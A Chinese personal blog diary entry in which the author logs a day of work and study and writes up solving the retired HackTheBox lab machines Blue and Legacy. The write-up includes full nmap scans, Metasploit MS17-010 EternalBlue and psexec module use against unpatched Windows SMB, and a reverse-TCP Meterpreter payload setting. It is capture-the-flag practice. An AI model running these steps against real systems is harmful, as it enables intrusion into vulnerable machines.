2021/3/25的修行

字数统计: 1.7k字   |   阅读时长≈ 9分

约束订立:2021/3/29前做到心情恢复能达成正常工作效率的最低状态

推荐给各位一些歌单吧




悲伤的话就听听悲伤的歌吧,这样,就不会误以为自己在独自悲伤了

在这残酷的世界下,悲剧何其之多,吾等充其量只为其中之一而已

牢记这一点,背负痛苦然后继续前进吧

因为此时此处绝不是道路的终结

1. 上班

2. 继续学习《设计模式之禅》

3. HackTheBox Retired 【Blue】打掉 (完全没看tutorial!)

3.1 nmap

惯例nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
$ nmap -v -A -Pn 10.129.113.83
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-25 23:25 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:25
Completed NSE at 23:25, 0.00s elapsed
Initiating NSE at 23:25
Completed NSE at 23:25, 0.00s elapsed
Initiating NSE at 23:25
Completed NSE at 23:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 23:25
Completed Parallel DNS resolution of 1 host. at 23:25, 0.01s elapsed
Initiating Connect Scan at 23:25
Scanning 10.129.113.83 [1000 ports]
Discovered open port 139/tcp on 10.129.113.83
Discovered open port 135/tcp on 10.129.113.83
Discovered open port 445/tcp on 10.129.113.83
Increasing send delay for 10.129.113.83 from 0 to 5 due to max_successful_tryno increase to 4
Discovered open port 49153/tcp on 10.129.113.83
Discovered open port 49152/tcp on 10.129.113.83
Discovered open port 49156/tcp on 10.129.113.83
Discovered open port 49154/tcp on 10.129.113.83
Discovered open port 49155/tcp on 10.129.113.83
Discovered open port 49157/tcp on 10.129.113.83
Completed Connect Scan at 23:25, 47.07s elapsed (1000 total ports)
Initiating Service scan at 23:25
Scanning 9 services on 10.129.113.83
Service scan Timing: About 55.56% done; ETC: 23:27 (0:00:49 remaining)
Completed Service scan at 23:27, 68.94s elapsed (9 services on 1 host)
NSE: Script scanning 10.129.113.83.
Initiating NSE at 23:27
Completed NSE at 23:27, 15.40s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Nmap scan report for 10.129.113.83
Host is up (0.24s latency).
Not shown: 991 closed ports                                                                                                                                                                                                                                                              
PORT      STATE SERVICE      VERSION                                                                                                                                                                                                                                                     
135/tcp   open  msrpc        Microsoft Windows RPC                                                                                                                                                                                                                                       
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                                                                                                                                                                                                                               
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)                                                                                                                                                                              
49152/tcp open  msrpc        Microsoft Windows RPC                                                                                                                                                                                                                                       
49153/tcp open  msrpc        Microsoft Windows RPC                                                                                                                                                                                                                                       
49154/tcp open  msrpc        Microsoft Windows RPC                                                                                                                                                                                                                                       
49155/tcp open  msrpc        Microsoft Windows RPC                                                                                                                                                                                                                                       
49156/tcp open  tcpwrapped                                                                                                                                                                                                                                                               
49157/tcp open  msrpc        Microsoft Windows RPC                                                                                                                                                                                                                                       
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                         
Host script results:                                                                                                                                                                                                                                                                     
|_clock-skew: mean: 1s, deviation: 1s, median: 1s                                                                                                                                                                                                                                        
| smb-os-discovery:                                                                                                                                                                                                                                                                      
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)                                                                                                                                                                                                          
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional                                                                                                                                                                                                                                 
|   Computer name: haris-PC                                                                                                                                                                                                                                                              
|   NetBIOS computer name: HARIS-PC\x00                                                                                                                                                                                                                                                  
|   Workgroup: WORKGROUP\x00                                                                                                                                                                                                                                                             
|_  System time: 2021-03-25T15:27:10+00:00                                                                                                                                                                                                                                               
| smb-security-mode:                                                                                                                                                                                                                                                                     
|   account_used: guest                                                                                                                                                                                                                                                                  
|   authentication_level: user                                                                                                                                                                                                                                                           
|   challenge_response: supported                                                                                                                                                                                                                                                        
|_  message_signing: disabled (dangerous, but default)                                                                                                                                                                                                                                   
| smb2-security-mode:                                                                                                                                                                                                                                                                    
|   2.02:                                                                                                                                                                                                                                                                                
|_    Message signing enabled but not required                                                                                                                                                                                                                                           
| smb2-time:                                                                                                                                                                                                                                                                             
|   date: 2021-03-25T15:27:11                                                                                                                                                                                                                                                            
|_  start_date: 2021-03-25T15:24:20                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                         
NSE: Script Post-scanning.                                                                                                                                                                                                                                                               
Initiating NSE at 23:27                                                                                                                                                                                                                                                                  
Completed NSE at 23:27, 0.00s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.73 seconds

3.2 信息搜集

windows 7 professional 7601 service pack 1 exploit

直接得到一个洞

EternalBlue

等等

这个靶机的名字就叫Blue

那tm八九不离十了吧

干干干

先去msf搜索下EternalBlue或者MS17-010

拿到exploit/windows/smb/ms17_010_eternalblue

然后直接一套打死就完事了

4. HackTheBox Retired 【Legacy】打掉 (完全没看tutorial!)

4.1 nmap

惯例nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
$ nmap -v -A -Pn 10.129.123.33
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 01:15 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:15
Completed NSE at 01:15, 0.00s elapsed
Initiating NSE at 01:15
Completed NSE at 01:15, 0.00s elapsed
Initiating NSE at 01:15
Completed NSE at 01:15, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 01:15
Completed Parallel DNS resolution of 1 host. at 01:15, 0.01s elapsed
Initiating Connect Scan at 01:15
Scanning 10.129.123.33 [1000 ports]
Discovered open port 139/tcp on 10.129.123.33
Discovered open port 445/tcp on 10.129.123.33
Completed Connect Scan at 01:15, 14.43s elapsed (1000 total ports)
Initiating Service scan at 01:15
Scanning 2 services on 10.129.123.33
Completed Service scan at 01:15, 6.97s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.123.33.
Initiating NSE at 01:15
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 3 (3 waiting)
NSE Timing: About 98.92% done; ETC: 01:15 (0:00:00 remaining)
Stats: 0:01:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.64% done; ETC: 01:16 (0:00:00 remaining)
Completed NSE at 01:16, 55.00s elapsed
Initiating NSE at 01:16
Completed NSE at 01:16, 0.00s elapsed
Initiating NSE at 01:16
Completed NSE at 01:16, 0.00s elapsed
Nmap scan report for 10.129.123.33
Host is up (0.24s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds                                                                                                                                                                                                                                    
3389/tcp closed ms-wbt-server                                                                                                                                                                                                                                                            
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                         
Host script results:                                                                                                                                                                                                                                                                     
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s                                                                                                                                                                                                                
| nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ec:b8 (VMware)                                                                                                                                                                                            
| Names:                                                                                                                                                                                                                                                                                 
|_                                                                                                                                                                                                                                                                                       
| smb-os-discovery:                                                                                                                                                                                                                                                                      
|   OS: Windows XP (Windows 2000 LAN Manager)                                                                                                                                                                                                                                            
|   OS CPE: cpe:/o:microsoft:windows_xp::-                                                                                                                                                                                                                                               
|   Computer name: legacy                                                                                                                                                                                                                                                                
|   NetBIOS computer name: LEGACY\x00                                                                                                                                                                                                                                                    
|   Workgroup: HTB\x00                                                                                                                                                                                                                                                                   
|_  System time: 2021-03-30T22:13:21+03:00                                                                                                                                                                                                                                               
| smb-security-mode:                                                                                                                                                                                                                                                                     
|   account_used: guest                                                                                                                                                                                                                                                                  
|   authentication_level: user                                                                                                                                                                                                                                                           
|   challenge_response: supported                                                                                                                                                                                                                                                        
|_  message_signing: disabled (dangerous, but default)                                                                                                                                                                                                                                   
|_smb2-time: Protocol negotiation failed (SMB2)                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                         
NSE: Script Post-scanning.                                                                                                                                                                                                                                                               
Initiating NSE at 01:16                                                                                                                                                                                                                                                                  
Completed NSE at 01:16, 0.00s elapsed                                                                                                                                                                                                                                                    
Initiating NSE at 01:16                                                                                                                                                                                                                                                                  
Completed NSE at 01:16, 0.00s elapsed                                                                                                                                                                                                                                                    
Initiating NSE at 01:16                                                                                                                                                                                                                                                                  
Completed NSE at 01:16, 0.00s elapsed                                                                                                                                                                                                                                                    
Read data files from: /usr/bin/../share/nmap                                                                                                                                                                                                                                             
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                                                                                           
Nmap done: 1 IP address (1 host up) scanned in 76.71 seconds

4.2

直接用exploit/windows/smb/ms17_010_eternalblue草草看

1
2
3
4
5
6
7
8
9
10
11
12
13
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.9:4444 
[*] 10.129.123.33:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.129.123.33:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.123.33:445     - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[*] 10.129.123.33:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.123.33:445 - The target is vulnerable.
[*] 10.129.123.33:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.123.33:445     - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[*] 10.129.123.33:445     - Scanned 1 of 1 hosts (100% complete)
[-] 10.129.123.33:445 - Exploit aborted due to failure: no-target: This exploit module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.

哦吼。

那 设置下PAYLOAD

1
set PAYLOAD windows/x64/meterpreter/reverse_tcp

再来一次!

。。。还是不行吗

那 换一个。

exploit/windows/smb/ms17_010_psexec能用。

唯一要注意的是 这机子很老 所以 放flag的文件夹和现代的windows有差距

找到文件直接type或者more就得了

找到合适的exp的话毫无难度

5. 看【Blue】和【Legacy】的tutorial,并复盘

看了pdf后,感觉没有任何收获……

并且没有任何可以反省的

我这次做的已经很努力了,所以没问题

啊,对了 我打Legacy似乎跟题解用的不是同一个exp,23333

看来那台机子漏洞还蛮多嘛

6. 学习1Z0-819相关课程若干

7. 改良博客样式

看见左下角的尼尔机械纪元OST和右下角的steam用户简介没^_^

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

自称为XenoAmess的方术师。

为了得到【意义】而进行各种各样的修行。

Hack The Box